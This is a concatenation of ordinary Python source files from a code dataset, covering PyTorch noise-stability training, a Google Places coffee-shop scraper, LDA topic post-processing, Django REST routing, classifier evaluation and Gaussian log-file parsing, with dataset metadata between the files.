schedule.')\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M',\n help='momentum')\nparser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--noise_sd', default=0.0, type=float,\n help=\"standard deviation of Gaussian noise for data augmentation\")\nparser.add_argument('--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--id', default=None, type=int,\n help='experiment id, `randint(10000)` if None')\n\n#####################\n# Options added by Salman et al. (2019)\nparser.add_argument('--resume', action='store_true',\n help='if true, tries to resume training from existing checkpoint')\nparser.add_argument('--pretrained-model', type=str, default='',\n help='Path to a pretrained model')\n\n\n#####################\n# Stability training hyperparameter\nparser.add_argument('--lbd', default=2.0, type=float)\n\n\nargs = parser.parse_args()\nargs.outdir = f\"logs/{args.dataset}/stab/lbd_{args.lbd}/noise_{args.noise_sd}\"\n\n\ndef _cross_entropy(input, targets, reduction='mean'):\n targets_prob = F.softmax(targets, dim=1)\n xent = (-targets_prob * F.log_softmax(input, dim=1)).sum(1)\n if reduction == 'sum':\n return xent.sum()\n elif reduction == 'mean':\n return xent.mean()\n elif reduction == 'none':\n return xent\n else:\n raise NotImplementedError()\n\n\ndef main():\n train_loader, test_loader, criterion, model, optimizer, scheduler, \\\n starting_epoch, logfilename, model_path, device, writer = prologue(args)\n\n for epoch in range(starting_epoch, args.epochs):\n before = time.time()\n train_loss, train_acc = train(train_loader, model, criterion, optimizer, epoch, args.noise_sd, device, writer)\n test_loss, test_acc = test(test_loader, model, criterion, epoch, args.noise_sd, device, writer, args.print_freq)\n after = time.time()\n\n log(logfilename, \"{}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\\t{:.3}\".format(\n epoch, after - before,\n scheduler.get_lr()[0], train_loss, train_acc, test_loss, test_acc))\n\n # In PyTorch 1.1.0 and later, you should call `optimizer.step()` before `lr_scheduler.step()`.\n # See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate\n scheduler.step(epoch)\n\n torch.save({\n 'epoch': epoch + 1,\n 'arch': args.arch,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, model_path)\n\n\ndef train(loader: DataLoader, model: torch.nn.Module, criterion, optimizer: Optimizer,\n epoch: int, noise_sd: float, device: torch.device, writer=None):\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n losses_reg = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n end = time.time()\n\n # switch to train mode\n model.train()\n\n for i, (inputs, targets) in enumerate(loader):\n # measure data loading time\n data_time.update(time.time() - end)\n\n inputs, targets = inputs.to(device), targets.to(device)\n batch_size = inputs.size(0)\n\n # augment inputs with noise\n noise = torch.randn_like(inputs, device=device) * noise_sd\n\n logits = model(inputs)\n logits_n = model(inputs + noise)\n loss_xent = criterion(logits, targets)\n\n stab = _cross_entropy(logits_n, logits)\n loss = loss_xent + args.lbd * stab\n\n acc1, acc5 = accuracy(logits_n, targets, topk=(1, 5))\n losses.update(loss_xent.item(), batch_size)\n losses_reg.update(stab.item(), batch_size)\n top1.update(acc1.item(), batch_size)\n top5.update(acc5.item(), batch_size)\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % args.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.avg:.3f}\\t'\n 'Data {data_time.avg:.3f}\\t'\n 'Loss {loss.avg:.4f}\\t'\n 'Acc@1 {top1.avg:.3f}\\t'\n 'Acc@5 {top5.avg:.3f}'.format(\n epoch, i, len(loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1, top5=top5))\n\n if writer:\n writer.add_scalar('loss/train', losses.avg, epoch)\n writer.add_scalar('loss/stability', losses_reg.avg, epoch)\n writer.add_scalar('batch_time', batch_time.avg, epoch)\n writer.add_scalar('accuracy/train@1', top1.avg, epoch)\n writer.add_scalar('accuracy/train@5', top5.avg, epoch)\n\n return (losses.avg, top1.avg)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"code/train_stab.py","file_name":"train_stab.py","file_ext":"py","file_size_in_byte":6467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"6823547","text":"from requests_html import HTMLSession\nimport json\nimport time\n\n\nwith open('api.json', 'r') as f:\n api = json.load(f)\nlocation = '&location=10.779614,106.69925'\nradius = '&radius=5000'\ntype = '&type=cafe'\nkey = '&key=' + api['api_key']\nquery = 'query=coffee'\nlink = 'https://maps.googleapis.com/maps/api/place/textsearch/json?'\nfinal_link = '{}{}{}{}{}{}'.format(link, query, location, radius, type, key)\nnext_page = True\nresults = []\nwhile next_page:\n session = HTMLSession()\n r = session.get(final_link)\n json_format = r.json()\n third_key = json_format['results']\n for coffee in third_key:\n results.append(coffee['name'])\n if 'next_page_token' in json_format:\n page_token = 'pagetoken='\n final_link = '{}{}{}{}'.format(link, page_token, json_format['next_page_token'], key)\n time.sleep(20)\n # 20 can be change to another value , I used 20 to make sure the next_page_token works\n else:\n next_page = False\nwith open('hcm_coffee.json', 'w+', encoding='utf-8') as file:\n data = json.dumps(results[:50], ensure_ascii=False)\n file.write(data)","sub_path":"Bai9/coffee.py","file_name":"coffee.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"144647406","text":"import numpy as np\nimport math\nimport os\n\ndef sortTopWords(inputList):\n\tinputList.sort(key=lambda line: int(line[1]))\n\ndef plotSaveTopWords(folderPath, topWordList, index):\n\tsize = len(topWordList[0]) - 2\n\tX = range(0, size)\n\tfor line in topWordList:\n\t\tY = line[2 : size+2]\n\t\tplt.plot(X, Y, label=line[0])\n\t\tprint(\"X is: \" + str(X))\n\t\tprint(\"Y is: \" + str(Y))\n\t\tfig = plt.figure()\n\t\tplt.savefig(folderPath + \"/\" + str(index) + \"-top.jpg\")\n\t\n\treturn\n\ndef matchWord(dictPath, count):\n\tfp = open(dictPath, \"r\")\n\tlines = fp.readlines()\n\tif (count >= len(lines)):\n\t\treturn \"\"\n\telif (len(lines[count].split(\",\")) >= 2):\n\t\treturn lines[count].split(\",\")[1].rstrip()\n\telse:\n\t\treturn \"\"\n\ndef calculateAve(listInput):\n\treturn reduce(lambda x, y: x+y, listInput)/len(listInput)\n\ndef readFile(filePath):\n\tfileContent = np.loadtxt(filePath)\n\treturn fileContent\n\ndef findNumOfSeq(filePath):\n\tfp = open(filePath, \"r\")\n\tlines = fp.readlines()\n\twords = lines[2].split()\n\treturn int(words[1])\n\ndef writeNewFile(filePath, newMatrix):\n\tfp = open(filePath, 'w')\n\tfor line in newMatrix:\n\t\tfp.write(\"%s\\n\" % ','.join(str(part) for part in line))\n\nif (__name__==\"__main__\"):\n\n\tinfo_path = \"lda-seq/info.dat\"\n\tnumOfSeq = findNumOfSeq(info_path)\n\tfor x in range(0, 8):\n\t\ttopicName = \"test\" + str(x) + \".dat\"\n\t\tmatrix = readFile(topicName).tolist()\n\t\tdictPath = \"dict.txt.new\"\n\t\tupdatedMatrix = []\n\t\tcount = 0\n\t\tmatrix.pop(0)\n\t\tfor wordTopicDis in matrix:\n\t\t\tword = matchWord(dictPath, count)\n\t\t\taverage = calculateAve(wordTopicDis)\n\t\t\twordTopicDis.insert(0, word)\n\t\t\twordTopicDis.insert(1, average)\n\t\t\tupdatedMatrix.append(wordTopicDis)\n\t\t\tcount += 1\n\t\tupdatedMatrix.sort(key=lambda line: float(line[1]), reverse=True) #Reverse settings for big-to-small\n\t\t#sorted(updatedMatrix, key=lambda line: float(line[1]), reverse=True) This is not working\n\t\ttop20Words = updatedMatrix[0:19]\n\t\twriteNewFile(\"test\" + str(x) + \"word.dat\", updatedMatrix)\n\t\twriteNewFile(\"test\" + str(x) + \"top20words.dat\", top20Words)\n\t\t#plotSaveTopWords(dirName, top20Words, x)\n\n\tpass","sub_path":"program/Python/ProcessFlow/matchSoftware.py","file_name":"matchSoftware.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"18284595","text":"# Author: Tomas Hodan (hodantom@cmp.felk.cvut.cz)\n# Center for Machine Perception, Czech Technical University in Prague\n\n\"\"\"Configuration of the BOP Toolkit.\"\"\"\n\n######## Basic ########\n\n#base_path = r'/media/shbe/data/share-to-docker/bop/'\nbase_path = r'/home/hampus/vision/AugmentedAutoencoder/pytorch3d/data/bop/'\n\n# Folder with the BOP datasets.\ndatasets_path = r'{}bop-tless-dataset'.format(base_path)\n\n# Folder with pose results to be evaluated.\nresults_path = r'{}bop_sample_results/bop_challenge_2019'.format(base_path)\n\n# Folder for the calculated pose errors and performance scores.\neval_path = r'{}eval'.format(base_path)\n\n######## Extended ########\n\n# Folder for outputs (e.g. visualizations).\noutput_path = r'{}output'.format(base_path)\n\n# For offscreen C++ rendering: Path to the build folder of bop_renderer (github.com/thodan/bop_renderer).\nbop_renderer_path = r'/path/to/bop_renderer/build'\n\n# Executable of the MeshLab server.\nmeshlab_server_path = r'/path/to/meshlabserver.exe'\n\nprint(datasets_path)\n","sub_path":"bop_toolkit/bop_toolkit_lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"16594843","text":"# coding:utf-8\n\ndef unpack_sets(obj):\n \"\"\"\n Unpack all ObjectSet[Item] entries into the actual lists, removing the\n Item entry entirely.\n \"\"\"\n if isinstance(obj, dict):\n for key, value in list(obj.items()): # Forward compatibility with Python 3\n if key.endswith(\"Set\"):\n if value is None: # This means no Items!\n items = []\n elif isinstance(value, dict):\n if value.keys() == [\"Item\"]: # This means one or multiple Items!\n items = value[\"Item\"]\n if isinstance(items, dict): # If we only have one Item, wrap it in a list\n items = [items]\n else:\n assert False, \"This should never happen\"\n else:\n assert False, \"This should never happen\"\n obj[key] = items\n map(unpack_sets, obj.values())\n elif isinstance(obj, (list, tuple, set)):\n map(unpack_sets, obj)\n else:\n pass","sub_path":"scalr_client_core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"219657514","text":"# you can write to stdout for debugging purposes, e.g.\n# print(\"this is a debug message\")\n\ndef solution(A):\n # write your code in Python 3.6\n all_sum = sum(A)\n cur_sum = A[0]\n diff = abs(all_sum - 2 * cur_sum)\n i = 1\n while i < len(A) - 1:\n cur_sum += A[i]\n cur_diff = abs(all_sum - 2 * cur_sum)\n if cur_diff < diff:\n diff = cur_diff\n i += 1\n return diff\n","sub_path":"Lesson3-TimeComplexity/3-TapeEquilibrium/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"60625522","text":"import pandas as pd\nfrom pandas.io.json import json_normalize\npd.__version__\nimport matplotlib.pyplot as plt\nimport json\n\n\ndict = {}\ncount = 0\nwith open(\"pullRequests.json\") as json_file:\n json_data = json.load(json_file)\n\ndata = json_data['data']['viewer']['contributedRepositories']['edges']\nresult = json_normalize(data) \nresult\n\nfor index, row in result.iterrows():\n commitId = json_normalize(row['node.pullRequests.edges'])\n count=len(commitId.index)\n name = row['node.name']\n if name not in dict:\n dict[name] = 0\n dict[name] += count\n\ndf = pd.DataFrame.from_dict(dict,orient=\"index\")\nprint(df)\ndf\ndf.plot.bar(subplots=True, figsize=(8, 8))\nplt.show()\n","sub_path":"pullRequests.py","file_name":"pullRequests.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"187399131","text":"from datetime import datetime\n\nfrom sklearn import metrics\n\nfrom config.config import FilePathConfig, ClassifierConfig\nfrom util.util import Util\n\nclass TestResult(object):\n def __init__(self, predicted_class, raw_class_label, labels):\n self.predicted_class = predicted_class\n self.raw_class_label = raw_class_label\n self.labels = labels\n self.macro_precision = None\n self.macro_recall = None\n self.macro_f1 = None\n self.classification_report = None\n self.confusion_matrix = None\n self.prams = ClassifierConfig.classifier_pram_dic[ClassifierConfig.cur_single_model]\n\n def print_report(self):\n predicted_class = self.predicted_class\n raw_class_label = self.raw_class_label\n self.macro_precision = metrics.precision_score(raw_class_label, predicted_class, average=\"macro\")\n self.macro_recall = metrics.recall_score(raw_class_label, predicted_class, average=\"macro\")\n self.macro_f1 = metrics.f1_score(raw_class_label, predicted_class, average=\"macro\")\n\n self.classification_report = metrics.classification_report(raw_class_label, predicted_class,\n target_names=self.labels, digits=4)\n self.confusion_matrix = metrics.confusion_matrix(raw_class_label, predicted_class)\n\n Util.log_tool.log.info(self.classification_report.encode(FilePathConfig.file_encodeing))\n Util.log_tool.log.info(\n \"macro_precision:\" + str(self.macro_precision) + \",macro_recall:\" + str(\n self.macro_recall) + \"macro_f1:\" + str(self.macro_f1))\n self.save_report()\n\n def save_report(self):\n time = datetime.now().strftime(\"-%Y-%m-%d-%H-%M\")\n if ClassifierConfig.is_single_model:\n model_name = ClassifierConfig.cur_single_model\n else:\n model_name = ClassifierConfig.vote_name\n\n label = time + '-' + model_name\n\n Util.save_object_into_pkl(self, str(FilePathConfig.result_report_path) % label)\n","sub_path":"evaluation/test_result.py","file_name":"test_result.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"517362962","text":"# wandb initialization\n# Import callback function\nimport wandb\nfrom wandb.keras import WandbCallback\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport tensorflow as tf\nfrom tensorflow.keras import models, layers, optimizers, losses, utils, datasets\n\nwandb.init(project=\"atvt-board\")\n\nprint(\"Packge Loaded!\")\n\nwandb.log({\"generated_samples\":\n [wandb.Object3D(open(\"../data/Building,.obj\"))]})\n\n# Data Loading\n(train_x, train_y), (test_x, test_y) = datasets.mnist.load_data()\ntrain_x, test_x = np.reshape(train_x/255., [-1, 784]), np.reshape(test_x/255., [-1, 784])\n\nprint(\"Train Data's Shape : \", train_x.shape, train_y.shape)\nprint(\"Test Data's Shape : \", test_x.shape, test_y.shape)\n\n# Network Building\n## Using Sequential\nmlp = models.Sequential()\nmlp.add(layers.Dense(256, activation='relu', input_shape=(784,)))\nmlp.add(layers.Dense(128, activation='relu'))\nmlp.add(layers.Dense(10, activation='softmax'))\n\nprint(\"Network Built!\")\n\nmlp.compile(optimizer=optimizers.Adam(), loss=losses.sparse_categorical_crossentropy, metrics=['accuracy'])\n\nhistory = mlp.fit(train_x, train_y, epochs=10, batch_size=8,\n validation_data=(test_x, test_y),\n callbacks=[WandbCallback()]) # callbacks 에 Wandbcallback 추가\n","sub_path":"BE/Modeling/xlnet-advance/archive/wandb_setting_test.py","file_name":"wandb_setting_test.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"389441988","text":"\"\"\"case_study URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import routers\nfrom app.views import FundViewSet, CommitViewSet, CallViewSet, FundInvestViewSet, DashboardViewSet, CalculateViewSet\n\nfund_list = FundViewSet.as_view({'get': 'list','post':'create'})\nfund_detail = FundViewSet.as_view({'get': 'retrieve','put':'update'})\n\ncommit_list = CommitViewSet.as_view({'get': 'list','post':'create'})\ncommit_detail = CommitViewSet.as_view({'get': 'retrieve'})\n\ncall_list = CallViewSet.as_view({'get': 'list','post':'create'})\ncall_detail = CallViewSet.as_view({'get': 'retrieve'})\n\nfundinvest_list = FundInvestViewSet.as_view({'get': 'list','post':'create'})\nfundinvest_detail = FundInvestViewSet.as_view({'get': 'retrieve'})\n\nsummary_list = DashboardViewSet.as_view({'get': 'list'})\n\ncalculateSummary_list = CalculateViewSet.as_view({'get': 'list'})\n# Routers provide an easy way of automatically determining the URL conf.\nrouter = routers.SimpleRouter()\nrouter.register(r'funds', FundViewSet, basename='fund')\nrouter.register(r'commits', CommitViewSet, basename='commit')\nrouter.register(r'calls', CallViewSet, basename='call')\nrouter.register(r'invests', FundInvestViewSet, basename='invest')\nrouter.register(r'summary', DashboardViewSet, basename='summary')\nrouter.register(r'calculate', CalculateViewSet, basename='calculate')\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', include(router.urls)),\n path('api-auth/', include('rest_framework.urls')),\n]\n","sub_path":"case_study/case_study/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"461741169","text":"#!/usr/bin/env python\n\n######################################################.\n# \t\t This file stores all the functions \t #\n# \t \t used in the LOG file analyzer\t \t #\n######################################################.\n\nimport os\nimport sys\nimport subprocess\nimport shutil\nimport numpy as np\nimport pandas as pd\nfrom pyconfort.writer_functions import input_route_line\nfrom pyconfort.argument_parser import possible_atoms\n\npossible_atoms = possible_atoms()\n\ndef moving_log_files(source, destination, file):\n\ttry:\n\t\tos.makedirs(destination)\n\t\tshutil.move(source, destination)\n\texcept OSError:\n\t\tif os.path.isdir(destination) and not os.path.exists(destination+file):\n\t\t\tshutil.move(source, destination)\n\t\telse:\n\t\t\traise\n\n# DETECTION OF GEN/GENECP\ndef check_for_gen_or_genecp(ATOMTYPES,args):\n\t# Options for genecp\n\tecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp = [],False,False,None\n\n\tfor _,atomtype in enumerate(ATOMTYPES):\n\t\tif atomtype not in ecp_list and atomtype in possible_atoms:\n\t\t\tecp_list.append(atomtype)\n\t\tif atomtype in args.genecp_atoms:\n\t\t\tecp_genecp_atoms = True\n\t\tif atomtype in args.gen_atoms:\n\t\t\tecp_gen_atoms = True\n\tif ecp_gen_atoms:\n\t\tgenecp = 'gen'\n\tif ecp_genecp_atoms:\n\t\tgenecp = 'genecp'\n\n\treturn ecp_list,ecp_genecp_atoms,ecp_gen_atoms,genecp\n\ndef write_header_and_coords(fileout,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS):\n\tfileout.write(\"%mem=\"+str(args.mem)+\"\\n\")\n\tfileout.write(\"%nprocshared=\"+str(args.nprocs)+\"\\n\")\n\tfileout.write(\"# \"+keywords_opt+\"\\n\")\n\tfileout.write(\"\\n\")\n\tfileout.write(name+\"\\n\")\n\tfileout.write(str(CHARGE)+' '+str(MULT)+'\\n')\n\tfor atom in range(0,NATOMS):\n\t\tfileout.write('{0:>2} {1:12.8f} {2:12.8f} {3:12.8f}'.format(ATOMTYPES[atom], CARTESIANS[atom][0], CARTESIANS[atom][1], CARTESIANS[atom][2]))\n\t\tfileout.write(\"\\n\")\n\tfileout.write(\"\\n\")\n\ndef write_genecp(fileout,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,bs_com,lot_com,bs_gcp_com,args,w_dir_initial,w_dir):\n\tfor _,element_ecp in enumerate(ecp_list):\n\t\tif element_ecp not in (args.genecp_atoms or args.gen_atoms):\n\t\t\tfileout.write(element_ecp+' ')\n\tfileout.write('0\\n')\n\tfileout.write(bs_com+'\\n')\n\tfileout.write('****\\n')\n\n\tif len(bs_gcp_com.split('.')) > 1:\n\t\tif bs_gcp_com.split('.')[1] == 'txt' or bs_gcp_com.split('.')[1] == 'yaml':\n\t\t\tos.chdir(w_dir_initial)\n\t\t\tread_lines = open(bs_gcp_com,\"r\").readlines()\n\t\t\tos.chdir(w_dir)\n\t\t\t#getting the title line\n\t\t\tfor line in read_lines:\n\t\t\t\tfileout.write(line)\n\t\t\tfileout.write('\\n\\n')\n\telse:\n\t\tfor _,element_ecp in enumerate(ecp_list):\n\t\t\tif element_ecp in args.genecp_atoms :\n\t\t\t\tfileout.write(element_ecp+' ')\n\t\t\telif element_ecp in args.gen_atoms :\n\t\t\t\tfileout.write(element_ecp+' ')\n\t\tfileout.write('0\\n')\n\t\tfileout.write(bs_gcp_com+'\\n')\n\t\tfileout.write('****\\n\\n')\n\t\tif ecp_genecp_atoms:\n\t\t\tfor _,element_ecp in enumerate(ecp_list):\n\t\t\t\tif element_ecp in args.genecp_atoms:\n\t\t\t\t\tfileout.write(element_ecp+' ')\n\t\t\tfileout.write('0\\n')\n\t\t\tfileout.write(bs_gcp_com+'\\n\\n')\n\n# CREATION OF COM FILES\ndef new_com_file(w_dir,w_dir_initial,file,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,TERMINATION,IM_FREQS,bs_com,lot_com,bs_gcp_com):\n\tif args.sp:\n\t\tif args.suffix_sp is None:\n\t\t\tfileout = open(file.split(\".\")[0]+'-'+lot_com+'-'+bs_com+'.com', \"w\")\n\t\telse:\n\t\t\tfileout = open(file.split(\".\")[0]+'-'+args.suffix_sp+'-'+lot_com+'-'+bs_com+'.com', \"w\")\n\telse:\n\t\tfileout = open(file.split(\".\")[0]+'.com', \"w\")\n\n\twrite_header_and_coords(fileout,args,keywords_opt,name,CHARGE,MULT,NATOMS,ATOMTYPES,CARTESIANS)\n\n\tif genecp == 'genecp' or genecp == 'gen':\n\t\twrite_genecp(fileout,genecp,ecp_list,ecp_genecp_atoms,ecp_gen_atoms,bs_com,lot_com,bs_gcp_com,args,w_dir_initial,w_dir)\n\n\tif args.sp and TERMINATION == \"normal\" and IM_FREQS == 0 :\n\t\tfileout.write(args.last_line_for_sp)\n\t\tfileout.write('\\n\\n')\n\n\tfileout.close()\n\ndef read_log_file(w_dir,file):\n\tbreak_loop = False\n\tos.chdir(w_dir)\n\ttry:\n\t\toutfile = open(file,\"r\")\n\texcept FileNotFoundError:\n\t\tbreak_loop = True\n\toutlines = outfile.readlines()\n\n\treturn outlines, outfile, break_loop\n\ndef get_initial_variables():\n\trms = 10000\n\tstop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,dist_rot_or = 0,0,0,0,0,0,0,0,0\n\tATOMTYPES, CARTESIANS, FREQS, READMASS, FORCECONST, NORMALMODE = [],[],[],[],[],[]\n\tTERMINATION,ERRORTYPE = 'unfinished','unknown'\n\n\treturn rms,stop_rms,stand_or,NATOMS,IM_FREQS,freqs_so_far,stop_name,stop_term,nfreqs,ATOMTYPES,CARTESIANS,FREQS,READMASS,FORCECONST,NORMALMODE,TERMINATION,ERRORTYPE,dist_rot_or\n\ndef get_name_charge_multiplicity(outlines,stop_name):\n\t# only for name an and charge\n\tfor i,outline in enumerate(outlines):\n\t\tif stop_name == 2:\n\t\t\tbreak\n\t\t# Get the name of the compound (specified in the title)\n\t\tif outline.find('Symbolic Z-matrix:') > -1:\n\t\t\tname = outlines[i-2]\n\t\t\tstop_name += 1\n\t\t# Determine charge and multiplicity\n\t\tif outline.find(\"Charge = \") > -1:\n\t\t\tCHARGE = int(outline.split()[2])\n\t\t\tMULT = int(outline.split()[5].rstrip(\"\\n\"))\n\t\t\tstop_name += 1\n\treturn name, CHARGE, MULT\n\ndef get_termination_type(outlines,stop_term,TERMINATION,ERRORTYPE):\n\t# use reversed loops to find type of termination (faster than forward loops)\n\tfor i in reversed(range(len(outlines)-15,len(outlines))):\n\t\tif stop_term == 1:\n\t\t\tbreak\n\t\t# Determine the kind of job termination\n\t\tif outlines[i].find(\"Normal termination\") > -1:\n\t\t\tTERMINATION = \"normal\"\n\t\t\tstop_term += 1\n\t\telif outlines[i].find(\"Error termination\") > -1:\n\t\t\tTERMINATION = \"error\"\n\t\t\tif outlines[i-1].find(\"Atomic number out of range\") > -1 or outlines[i-1].find(\"basis sets are only available\") > -1 :\n\t\t\t\tERRORTYPE = \"atomicbasiserror\"\n\t\t\tif outlines[i-3].find(\"SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error SCF Error\") > -1:\n\t\t\t\tERRORTYPE = \"SCFerror\"\n\t\t\tstop_term += 1\n\treturn TERMINATION,ERRORTYPE\n\ndef get_geom_and_freq_for_normal(outlines, args, TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or):\n\tstop_get_details_stand_or, stop_get_details_dis_rot,finding_freq_line,stop_finding_freq_line = 0,0,0,0\n\t# reverse loop to speed up the reading of the output files\n\tfor i in reversed(range(0,len(outlines))):\n\t\tif TERMINATION == \"normal\":\n\t\t\tif not args.frequencies:\n\t\t\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1:\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1 and stop_finding_freq_line ==1 :\n\t\t\t\t\tbreak\n\t\t\t# Sets where the final coordinates are inside the file\n\t\t\tif stop_get_details_dis_rot !=1 and (outlines[i].find(\"Distance matrix\") > -1 or outlines[i].find(\"Rotational constants\") >-1) :\n\t\t\t\tif outlines[i-1].find(\"-------\") > -1:\n\t\t\t\t\tdist_rot_or = i\n\t\t\t\t\tstop_get_details_dis_rot += 1\n\t\t\tif outlines[i].find(\"Standard orientation\") > -1 and stop_get_details_stand_or !=1 :\n\t\t\t\tstand_or = i\n\t\t\t\tNATOMS = dist_rot_or-i-6\n\t\t\t\tstop_get_details_stand_or += 1\n\t\t\tif args.frequencies:\n\t\t\t\tif outlines[i].find(\" Harmonic frequencies\") > -1 and stop_finding_freq_line !=1 :\n\t\t\t\t\tfinding_freq_line = i\n\n\tif args.frequencies:\n\t\tfor i in range(finding_freq_line,len(outlines)):\n\t\t\t# Get the frequencies and identifies negative frequencies\n\t\t\tif outlines[i].find(\" Frequencies -- \") > -1:\n\t\t\t\tnfreqs = len(outlines[i].split())\n\t\t\t\tfor j in range(2, nfreqs):\n\t\t\t\t\tFREQS.append(float(outlines[i].split()[j]))\n\t\t\t\t\tNORMALMODE.append([])\n\t\t\t\t\tif float(outlines[i].split()[j]) < 0.0:\n\t\t\t\t\t\tIM_FREQS += 1\n\t\t\t\tfor j in range(3, nfreqs+1):\n\t\t\t\t\tREADMASS.append(float(outlines[i+1].split()[j]))\n\t\t\t\tfor j in range(3, nfreqs+1):\n\t\t\t\t\tFORCECONST.append(float(outlines[i+2].split()[j]))\n\t\t\t\tfor j in range(0,NATOMS):\n\t\t\t\t\tfor k in range(0, nfreqs-2):\n\t\t\t\t\t\tNORMALMODE[(freqs_so_far + k)].append([float(outlines[i+5+j].split()[3*k+2]), float(outlines[i+5+j].split()[3*k+3]), float(outlines[i+5+j].split()[3*k+4])])\n\t\t\t\tfreqs_so_far = freqs_so_far + nfreqs - 2\n\t\t\tif TERMINATION != \"normal\":\n\t\t\t\tif outlines[i].find('Cartesian Forces: Max') > -1:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tif float(outlines[i].split()[5]) < rms:\n\t\t\t\t\t\t\trms = float(outlines[i].split()[5])\n\t\t\t\t\t\t\tstop_rms = i\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\trms = 10000\n\treturn TERMINATION, NATOMS, FREQS, NORMALMODE, IM_FREQS, READMASS, FORCECONST, nfreqs, freqs_so_far, rms, stop_rms, dist_rot_or, stand_or\n\ndef get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS):\n\tfor i in range(stand_or+5,stand_or+5+NATOMS):\n\t\tmassno = int(outlines[i].split()[1])\n\t\tif massno < len(possible_atoms):\n\t\t\tatom_symbol = possible_atoms[massno]\n\t\telse:\n\t\t\tatom_symbol = \"XX\"\n\t\tATOMTYPES.append(atom_symbol)\n\t\tCARTESIANS.append([float(outlines[i].split()[3]), float(outlines[i].split()[4]), float(outlines[i].split()[5])])\n\n\treturn ATOMTYPES, CARTESIANS\n\ndef get_coords_not_normal(outlines, stop_rms, stand_or, dist_rot_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS):\n\tif stop_rms == 0:\n\t\tlast_line = len(outlines)\n\telse:\n\t\tlast_line = stop_rms\n\tstop_get_details_stand_or = 0\n\tstop_get_details_dis_rot = 0\n\tfor i in reversed(range(0,last_line)):\n\t\tif stop_get_details_stand_or == 1 and stop_get_details_dis_rot == 1:\n\t\t\tbreak\n\t\t# Sets where the final coordinates are inside the file\n\t\tif outlines[i].find(\"Standard orientation\") > -1 and stop_get_details_stand_or != 1:\n\t\t\tstand_or = i\n\t\t\tNATOMS = dist_rot_or-i-6\n\t\t\tstop_get_details_stand_or += 1\n\t\tif stop_get_details_stand_or != 1 and (outlines[i].find(\"Distance matrix\") > -1 or outlines[i].find(\"Rotational constants\") >-1):\n\t\t\tif outlines[i-1].find(\"-------\") > -1:\n\t\t\t\tdist_rot_or = i\n\t\t\t\tstop_get_details_dis_rot += 1\n\n\tATOMTYPES, CARTESIANS = get_coords_normal(outlines, stand_or, NATOMS, possible_atoms, ATOMTYPES, CARTESIANS)\n\n\treturn ATOMTYPES, CARTESIANS, 